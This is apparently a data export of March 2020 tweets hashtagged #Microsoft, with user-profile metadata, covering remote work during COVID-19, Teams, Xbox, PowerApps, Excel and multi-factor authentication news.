    <t>{'id': 544079024, 'id_str': '544079024', 'name': 'TechData Academy UK', 'screen_name': 'TDAcademy_UK', 'location': 'Locations in Bracknell and London', 'description': 'TechData Academy is a leading provider of educational services for multiple vendors including VMware, Veeam, IBM, and ForgeRock.', 'url': 'https://t.co/VRio1rPDu6', 'entities': {'url': {'urls': [{'url': 'https://t.co/VRio1rPDu6', 'expanded_url': 'https://academy.techdata.com/uk/training/', 'display_url': 'academy.techdata.com/uk/training/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 299, 'friends_count': 375, 'listed_count': 11, 'created_at': 'Tue Apr 03 08:01:34 +0000 2012', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 681, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5EEED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/896996504573005824/wMqSOLKE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/896996504573005824/wMqSOLKE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/544079024/1502447108', 'profile_link_color': '3B94D9',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</si>
  <si>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08:40:01 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus Impact on Tech-world.
With the rapid spread of Coronavirus (COVID-19), it has started to create havoc in the #technological industry
https://t.co/QhjzMlUD1u
#covid19 #CoronavirusOutbreak #CoronaAlert #CoronaVirusUpdate #Apple #Google #Microsoft #Samsung  #Tesla https://t.co/53JzYUJswD</t>
  </si>
  <si>
    <t>{'id': 727803364268900353, 'id_str': '727803364268900353', 'name': 'CIO Applications', 'screen_name': 'CIOApplications', 'location': '', 'description': 'CIO Applications is a technology print magazine for the millennial focusing on the usage of various tech start ups. RSS Feeds https://t.co/OTlPAOvRyk', 'url': 'https://t.co/spEklhA6h6', 'entities': {'url': {'urls': [{'url': 'https://t.co/spEklhA6h6', 'expanded_url': 'https://www.cioapplications.com/', 'display_url': 'cioapplications.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/OTlPAOvRyk', 'expanded_url': 'http://bit.ly/2OhERT3', 'display_url': 'bit.ly/2OhERT3', 'indices': [126, 149]}]}}, 'protected': False, 'followers_count': 3486, 'friends_count': 3839, 'listed_count': 98, 'created_at': 'Wed May 04 10:13:38 +0000 2016', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3839,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'http://pbs.twimg.com/profile_images/727804064050778112/H_wuaQNv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/727804064050778112/H_wuaQNv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/727803364268900353/1560241100',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</si>
  <si>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08:37:56 +0000 2020</t>
  </si>
  <si>
    <t>OT:  Kudos to a company with resources doing the right thing in a time of uncertainty. #Microsoft https://t.co/Ul77cNeLJ1</t>
  </si>
  <si>
    <t>{'id': 974211712885895169, 'id_str': '974211712885895169', 'name': 'Michael Kovacocy', 'screen_name': 'KovacocyMichael', 'location': '', 'description': 'Every single day is a great opportunity to do something special. Fluctuat nec mergitur.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 488, 'friends_count': 21, 'listed_count': 6, 'created_at': 'Thu Mar 15 09:12:27 +0000 2018', 'favourites_count': 815, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2045,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'http://pbs.twimg.com/profile_images/1219809399293784065/3VtIh3iq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219809399293784065/3VtIh3iq_normal.jpg',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</si>
  <si>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08:37:51 +0000 2020</t>
  </si>
  <si>
    <t>Congratulations to our WA winners Ryan Tyrell and Chris Rowson truly awesome team players #iCT group #innovation #ACS #telstra #cisco #microsoft https://t.co/Nd1BdCIqso</t>
  </si>
  <si>
    <t>{'id': 95848129, 'id_str': '95848129', 'name': 'Martin Bain', 'screen_name': 'Martin_FAE_ALBA', 'location': 'Perth, WA', 'description': 'Leadership In Action - â€œdeveloping people is at the heart of Leadership and Coaching is at the heart of developing peopleâ€', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 370, 'listed_count': 40, 'created_at': 'Thu Dec 10 07:21:12 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1014,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'http://pbs.twimg.com/profile_images/1040222982646325248/sWovIjes_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1040222982646325248/sWovIjes_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/95848129/1536843461',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</si>
  <si>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08:35:08 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive for Business: Microsoft is currently working on a new feature where you will be able to view and restore your previous versions of your files within the file browser in Windows or Mac Finder. #versionhistory #onedriveforbusiness #previousversion #microsoft #WeAreInSpark https://t.co/mnPOEDrJhz</t>
  </si>
  <si>
    <t>{'id': 1233298189408776193, 'id_str': '1233298189408776193', 'name': 'bilalelhaddouchi', 'screen_name': 'bilalelhaddouc1', 'location': 'Amsterdam', 'description': 'Modern Workplace Consultant @We_Are_InSpark |  Microsoft 365 | Intune | Identity | Office 365 | Azure Infra', 'url': 'https://t.co/X3vgOn0XF4', 'entities': {'url': {'urls': [{'url': 'https://t.co/X3vgOn0XF4', 'expanded_url': 'http://bilalelhaddouchi.nl', 'display_url': 'bilalelhaddouchi.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Fri Feb 28 07:49:44 +0000 2020', 'favourites_count': 11,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'http://pbs.twimg.com/profile_images/1233298347957592065/3mxt-g69_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233298347957592065/3mxt-g69_normal.jpg',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</si>
  <si>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08:34:56 +0000 2020</t>
  </si>
  <si>
    <t>For todays #RetroTrio we have the #Microsoft #Xbox, #Atari #Lynx2 and #Commodore #Amiga #CD32. Which do you keep, gift and delete from history? #RetroComputing #ComputerHistory #RetroGaming #VideoGames https://t.co/6YbNEceHs6</t>
  </si>
  <si>
    <t>{'id': 1017782206067019777, 'id_str': '1017782206067019777', 'name': 'South West Retro Computing Archive', 'screen_name': 'SWRetroComp', 'location': 'Plymouth, UK', 'description': 'An archive of vintage computers, video game consoles, handheld devices, and much more. Keeping yesterdayâ€™s technology safe for tomorrow!', 'url': 'https://t.co/KPcSr1ip82', 'entities': {'url': {'urls': [{'url': 'https://t.co/KPcSr1ip82', 'expanded_url': 'http://www.retro-computing.org', 'display_url': 'retro-computing.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2446, 'friends_count': 181, 'listed_count': 28, 'created_at': 'Fri Jul 13 14:46:02 +0000 2018', 'favourites_count': 11325, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2593, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1017784951373287425/Iq5inmnN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1017784951373287425/Iq5inmnN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1017782206067019777/1531929788',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</si>
  <si>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08:34:10 +0000 2020</t>
  </si>
  <si>
    <t>FREE eBook  The SysAdmin Guide to Azure Infrastructure as a Service #Azure #SysAdmin #Altaro: https://t.co/iwJkZs1rsY #Azure #Microsoft</t>
  </si>
  <si>
    <t>{'id': 14275828, 'id_str': '14275828', 'name': 'Andrew Darrow', 'screen_name': 'andrewdarrow', 'location': 'Hanover, PA', 'description': 'Agnostic #Cloud SA @EnsonoIT #SCCM /#WinServ SME, #InfoSec #Governance Nut,Tweets R my own.', 'url': 'http://t.co/WwmopJ754l', 'entities': {'url': {'urls': [{'url': 'http://t.co/WwmopJ754l', 'expanded_url': 'http://www.linkedin.com/pub/andrew-darrow/5/5aa/b2', 'display_url': 'linkedin.com/pub/andrew-darâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 573, 'friends_count': 698, 'listed_count': 170, 'created_at': 'Tue Apr 01 16:09:22 +0000 2008', 'favourites_count': 1035, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18808,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'http://pbs.twimg.com/profile_images/942042289169420289/v0KJodww_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/942042289169420289/v0KJodww_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14275828/1472261952', 'profile_link_color': '3C3A3A',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</si>
  <si>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08:30:15 +0000 2020</t>
  </si>
  <si>
    <t>Previously known by its codename 'Xbox Project Scarlett', the Xbox Series X is the next-generation Xbox, releasing in late 2020.
https://t.co/4OXfMCmXWO
#console #gamer #xbox #microsoft #gaming #gamingconsole #gamergirl https://t.co/N5s4aW29nV</t>
  </si>
  <si>
    <t>{'id': 1111254698022047745, 'id_str': '1111254698022047745', 'name': 'PC Clinica Tenerife', 'screen_name': 'TenerifePc', 'location': '', 'description': 'PC Clinica in South Tenerife provide a wide range of repair services and IT solutions to meet your home and business needs.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 103, 'listed_count': 0, 'created_at': 'Thu Mar 28 13:12:20 +0000 2019', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 146, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1111254780071022593/-o0uoOwL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111254780071022593/-o0uoOwL_normal.jpg',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</si>
  <si>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08:30:05 +0000 2020</t>
  </si>
  <si>
    <t>Just Posted: @Microsoft and @Genesys  Seize the Power of #Cloud
#Genesys and #Microsoft expand partnership
#UCOMS #UCNews #CC #CCTR #CX #OmniChannel https://t.co/lBRWnlOJEq</t>
  </si>
  <si>
    <t>{'id': 762875717122191360, 'id_str': '762875717122191360', 'name': 'UC Today News', 'screen_name': 'uctodaynews', 'location': '', 'description': 'Unified Communications, Collaboration &amp; CX #TechNews - #UCOMS #UCaaS #CloudComms #Collaboration #CCTR #CX #CCaaS #CPaaS #UnifedComms #Webex #MicrosoftTeams ++', 'url': 'https://t.co/2TvAQVIF7O', 'entities': {'url': {'urls': [{'url': 'https://t.co/2TvAQVIF7O', 'expanded_url': 'http://www.uctoday.com', 'display_url': 'uctoday.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7501, 'friends_count': 2693, 'listed_count': 126, 'created_at': 'Tue Aug 09 04:58:39 +0000 2016', 'favourites_count': 7559, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 19647, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/943528060804100096/ExHDQEID_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/943528060804100096/ExHDQEID_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/762875717122191360/1560790319',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</si>
  <si>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08:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Is your web application centrally protected and secure from exploits, vulnerabilities and attacks? If not, here's a blog that can help. https://t.co/ECZznZGbgz #WebApplicationFirewall #MicrosoftAzure #Cybersecurity #Microsoft https://t.co/coeKt2awwU</t>
  </si>
  <si>
    <t>{'id': 20488591, 'id_str': '20488591', 'name': 'e-Zest Solutions', 'screen_name': 'ezest', 'location': 'USA, Germany, UK, India', 'description': 'e-Zest is a Digital Technology Innovation Partner #EmergingTechnologies #Technology #DigitalInnovation #UpTheGame', 'url': 'https://t.co/ovNwC38AQX', 'entities': {'url': {'urls': [{'url': 'https://t.co/ovNwC38AQX', 'expanded_url': 'http://www.e-zest.com', 'display_url': 'e-zest.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4399, 'friends_count': 4697, 'listed_count': 545, 'created_at': 'Tue Feb 10 03:09:41 +0000 2009', 'favourites_count': 844, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9399, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0390CD', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234422198053376001/dMwrSUM9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234422198053376001/dMwrSUM9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20488591/1583144421', 'profile_link_color': 'FA743E', 'profile_sidebar_border_color': '0390CD', 'profile_sidebar_fill_color': 'F7F6F2', 'profile_text_color': '1A1A0A', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 08:28:54 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft adds Chrome themes support to new Edge browser #edge #microsoft #chrome
https://t.co/ps6U8nbzP9 https://t.co/JzBcsmLh0a</t>
  </si>
  <si>
    <t>{'id': 18945401, 'id_str': '18945401', 'name': 'ghacksnews', 'screen_name': 'ghacks', 'location': '', 'description': '', 'url': 'https://t.co/VmyGyGaHv8', 'entities': {'url': {'urls': [{'url': 'https://t.co/VmyGyGaHv8', 'expanded_url': 'https://www.ghacks.net/', 'display_url': 'ghacks.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6166, 'friends_count': 26, 'listed_count': 405, 'created_at': 'Tue Jan 13 17:39:58 +0000 2009', 'favourites_count': 5675, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14351,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'http://pbs.twimg.com/profile_images/456481603259084800/RbpKlX6L_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/456481603259084800/RbpKlX6L_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18945401/1397668816',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</si>
  <si>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08:28:19 +0000 2020</t>
  </si>
  <si>
    <t>The event will include -
1. Website Development using Django from Scratch to Deployment
2. Web Penetration Demo
and more fun activities.
So crack your knuckles and get ready cause it's time to code !
#MSPC #Microsoft #MicrosoftStudentPartnersCommunity</t>
  </si>
  <si>
    <t>{'id': 1227648791655768064, 'id_str': '1227648791655768064', 'name': 'Microsoft Student Partners Community', 'screen_name': 'kiit_mspc', 'location': 'KIIT University, Bhubaneswar', 'description': 'Welcome aboard the first ever Microsoft Student Partners Community in KIIT University!\n\nEmail: kiit.mspc@outlook.com', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Wed Feb 12 17:41:11 +0000 2020', 'favourites_count': 36, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1227825595867787269/NkvFVRwV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227825595867787269/NkvFVRwV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227648791655768064/1581571507',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</si>
  <si>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08:26:41 +0000 2020</t>
  </si>
  <si>
    <t>Wow!!! Couldnt better !!! #MS #microsoft #empowereveryperson
https://t.co/mcMhMdo55R</t>
  </si>
  <si>
    <t>{'id': 1343408618, 'id_str': '1343408618', 'name': 'Masaharu', 'screen_name': 'antithese_s', 'location': 'æ±äº¬éƒ½', 'description': 'é›»å­å›žè·¯å¤–è³‡ç³»ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ã‚’çµŒã¦GAFAMã®ã©ã‚Œã‹ã§ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ã—ã¦ã„ã¾ã™ã€‚ è‘—æ›¸ : å¤§äººã«ãªã‚‹å‰ã«èª­ã‚€ã€å¤§äººã«ãªã‚‹ç‚ºã®æœ¬ã€‚', 'url': 'https://t.co/LK8ErF3BDn', 'entities': {'url': {'urls': [{'url': 'https://t.co/LK8ErF3BDn', 'expanded_url': 'http://urx.blue/zYZI', 'display_url': 'urx.blue/zYZI', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1921, 'friends_count': 1273, 'listed_count': 2, 'created_at': 'Thu Apr 11 03:07:42 +0000 2013', 'favourites_count': 3101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1141,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'http://pbs.twimg.com/profile_images/1231006877229535232/SfxPXx9i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231006877229535232/SfxPXx9i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1343408618/1479041026', 'profile_link_color': '93A644', 'profile_sidebar_border_color': 'EEEEEE', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 08:24:15 +0000 2020</t>
  </si>
  <si>
    <t>@Steven_Abrahams Yes but... #educators still may need guidance, training and often lack of super fast infrastructure could get in the way. #Microsoft</t>
  </si>
  <si>
    <t>{'id': 322641013, 'id_str': '322641013', 'name': 'Ty Goddard', 'screen_name': 'ty_goddard', 'location': 'Work London; Brighton', 'description': 'Works @Ednfoundation | Chair of @EdtechukHQ | Board roles: @SHU_SIoE @scaleupinst @Finito    \n\n/// #Education #Edtech Agency for Insight and Advisory Services', 'url': 'https://t.co/eP0V5P1wly', 'entities': {'url': {'urls': [{'url': 'https://t.co/eP0V5P1wly', 'expanded_url': 'http://www.ednfoundation.org', 'display_url': 'ednfoundation.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8634, 'friends_count': 4766, 'listed_count': 283, 'created_at': 'Thu Jun 23 14:20:32 +0000 2011', 'favourites_count': 46489, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15585,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'http://pbs.twimg.com/profile_images/482550042138787840/MM25UxM6_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/482550042138787840/MM25UxM6_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/322641013/1568211613',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</si>
  <si>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08:23:07 +0000 2020</t>
  </si>
  <si>
    <t>Get this #personal #finance #document #template to #calculate incoming and outgoings from https://t.co/zpFL1NfkEx
#microsoft #docs #design #startups #picture #register #free #Easy #simple #excel #powerpoint #spreadsheet #online #passion #office https://t.co/BlH8Hfewzr</t>
  </si>
  <si>
    <t>Fri Mar 06 08:22:57 +0000 2020</t>
  </si>
  <si>
    <t>There is a #PowerAddict in the house of #Microsoft The Netherlands. Guess who?  https://t.co/LJsW3KiG4l</t>
  </si>
  <si>
    <t>{'id': 1054121890443341826, 'id_str': '1054121890443341826', 'name': 'Rick Bakker #PowerAddict', 'screen_name': 'formsandflows', 'location': 'The Netherlands', 'description': 'Passionate about building business solutions in the cloud with off-the-shelf tools | #PowerAddict | PowerApps community blogger/vlogger', 'url': 'https://t.co/pZqGIO41pH', 'entities': {'url': {'urls': [{'url': 'https://t.co/pZqGIO41pH', 'expanded_url': 'https://www.formsandflows.nl', 'display_url': 'formsandflows.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 434, 'friends_count': 119, 'listed_count': 6, 'created_at': 'Sun Oct 21 21:26:58 +0000 2018', 'favourites_count': 2147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1105,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'http://pbs.twimg.com/profile_images/1081233301552197632/Re_Qtq8s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081233301552197632/Re_Qtq8s_normal.jpg', 'profile_link_color': '742774',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</si>
  <si>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08:21:25 +0000 2020</t>
  </si>
  <si>
    <t>I Dont Know if i will be Playing The Xbox One Tonight because i woke up really Sick #XboxOne #Sick #Microsoft #NotWell #Gamer #Gaming</t>
  </si>
  <si>
    <t>{'id': 802386466844196864, 'id_str': '802386466844196864', 'name': 'GameSlayer', 'screen_name': 'GameSlayer63', 'location': 'Australia', 'description': 'Welcome to my Twitter Iâ€™m a Gamer, Geek and Nerd, Follow Me and Enjoy.. Xbox One- GameSlayer91 https://t.co/bx0VFGTd3y', 'url': 'https://t.co/KLKrhLcJI6', 'entities': {'url': {'urls': [{'url': 'https://t.co/KLKrhLcJI6', 'expanded_url': 'https://www.youtube.com/channel/UCJMUkhC141MB69AkJkEUR2g', 'display_url': 'youtube.com/channel/UCJMUkâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/bx0VFGTd3y', 'expanded_url': 'http://Www.Mixer.com/GameSlayer91', 'display_url': 'Mixer.com/GameSlayer91', 'indices': [95, 118]}]}}, 'protected': False, 'followers_count': 396, 'friends_count': 318, 'listed_count': 3, 'created_at': 'Sat Nov 26 05:40:16 +0000 2016', 'favourites_count': 1616, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 296, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1206464955005820928/A1j0Nnx1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206464955005820928/A1j0Nnx1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/802386466844196864/1582723190',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</si>
  <si>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08:19:02 +0000 2020</t>
  </si>
  <si>
    <t>The #coronavirus outbreak is causing organisations to transition to #RemoteWork.
Thankfully, @Microsoft is offering a free six-month trial of #MicrosoftTeams, to make that transition easier.
#Microsoft #Teams #Covid19
https://t.co/DixPipnUf7 https://t.co/FsIqAbTkHK</t>
  </si>
  <si>
    <t>Fri Mar 06 08:16:35 +0000 2020</t>
  </si>
  <si>
    <t>Pretty amazing how you can literally build any app you want from scratch with Microsoft PowerApps, without even having any previous programming knowledge. #PowerApps #Microsoft #100DaysOfCode https://t.co/e4GcfLxxU6</t>
  </si>
  <si>
    <t>{'id': 1213039902381658112, 'id_str': '1213039902381658112', 'name': 'Maria Spiritto', 'screen_name': 'mafespiritto', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 40, 'listed_count': 0, 'created_at': 'Fri Jan 03 10:10:31 +0000 2020', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1213039976558006272/bD8vmcQD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213039976558006272/bD8vmcQD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1213039902381658112/1578058650',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</si>
  <si>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08:16:21 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft: 99.9% of compromised accounts did not use multi-factor authentication | ZDNet https://t.co/x0zE4fJQ28 #microsoft</t>
  </si>
  <si>
    <t>{'id': 18822714, 'id_str': '18822714', 'name': 'Jim Ehrenberg', 'screen_name': 'SharePoint_Pros', 'location': 'ÃœT: 34.204326,-118.16473', 'description': 'LA based independent SharePoint/O365 consultant. Certified MSP. 25+ years experience. Local C2C or remote only. No F/T', 'url': 'https://t.co/rWqDeVO704', 'entities': {'url': {'urls': [{'url': 'https://t.co/rWqDeVO704', 'expanded_url': 'http://www.spspros.com', 'display_url': 'spspros.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1791, 'friends_count': 1656, 'listed_count': 107, 'created_at': 'Sat Jan 10 01:17:17 +0000 2009', 'favourites_count': 457, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6352,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'http://pbs.twimg.com/profile_images/1763487292/image_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1763487292/image_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18822714/1440099974', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'FAF7FA', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 08:15:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #M365 #MSTeams
Stay healthy @all! 
https://t.co/hZrbI5L7Nr</t>
  </si>
  <si>
    <t>Fri Mar 06 08:15:27 +0000 2020</t>
  </si>
  <si>
    <t>L = Lesson Being 2nd makes you work No one gets or stays good without work #WorkSmart #TeamRealzies #RCstreams #Twitch #Mixer #Dlive #YouTube #StreamerNetwork #Microsoft #Sony #Nintendo https://t.co/9X3gNL0SLK</t>
  </si>
  <si>
    <t>Fri Mar 06 08:15:10 +0000 2020</t>
  </si>
  <si>
    <t>#mustRead series of articles about #ZeroTrust
[Article] Enforcing Policy for Zero Trust with Azure Policy (4 of 6)
https://t.co/cp5AkvE7i1
#Identity #Microsoft #MFA #ConditionalAccess #CyberSecurity https://t.co/KYoC2SEkZH</t>
  </si>
  <si>
    <t>{'id': 4286507602, 'id_str': '4286507602', 'name': 'David das Neves', 'screen_name': 'david_das_neves', 'location': 'Munich, Germany', 'description': 'IT Architect @MunichRE | News on #Cloud, #PowerShell, #Security &amp; #EmergingTech', 'url': 'https://t.co/rtLrsJBYoZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/rtLrsJBYoZ', 'expanded_url': 'https://www.linkedin.com/in/daviddasneves/', 'display_url': 'linkedin.com/in/daviddasnevâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3568, 'friends_count': 2762, 'listed_count': 156, 'created_at': 'Thu Nov 26 15:05:24 +0000 2015', 'favourites_count': 13062, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 16905,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'http://pbs.twimg.com/profile_images/977635864548388864/VPBSR-JE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/977635864548388864/VPBSR-JE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4286507602/1528791295',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</si>
  <si>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08:14:47 +0000 2020</t>
  </si>
  <si>
    <t>@msexcel Vlookup @msexcel 
I use #vlookup everyday and it is the most interesting and useful formula of #msexcel #maniya44 
Now #xlookup has come even then Vlookup served us a very long time and cannot be forgotten at all
Thanks #Microsoft for vlookup and continued improvement to #Excel</t>
  </si>
  <si>
    <t>{'id': 298915055, 'id_str': '298915055', 'name': 'â“‚ï¸anushðŸ…°ï¸â™‘ï¸', 'screen_name': 'Maniya44', 'location': '', 'description': 'Human #maniya44 #ExcelPlanet To learn Excel subscribe my YouTube channel https://t.co/pBwdecRgPN', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/pBwdecRgPN', 'expanded_url': 'https://www.youtube.com/channel/UCuTk5-zyFBrKl4Vnwyo4BbQ', 'display_url': 'youtube.com/channel/UCuTk5â€¦', 'indices': [73, 96]}]}}, 'protected': False, 'followers_count': 62, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Sun May 15 05:18:13 +0000 2011', 'favourites_count': 4535, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2103,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'http://pbs.twimg.com/profile_images/948402921997127680/kDorQ_lf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/948402921997127680/kDorQ_lf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/298915055/1513831151',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</si>
  <si>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08:14:29 +0000 2020</t>
  </si>
  <si>
    <t>Enable that MF-ing MFA: 1.2 million Azure Active Directory accounts compromised every month, reckons #Microsoft https://t.co/R0zfXNofwq</t>
  </si>
  <si>
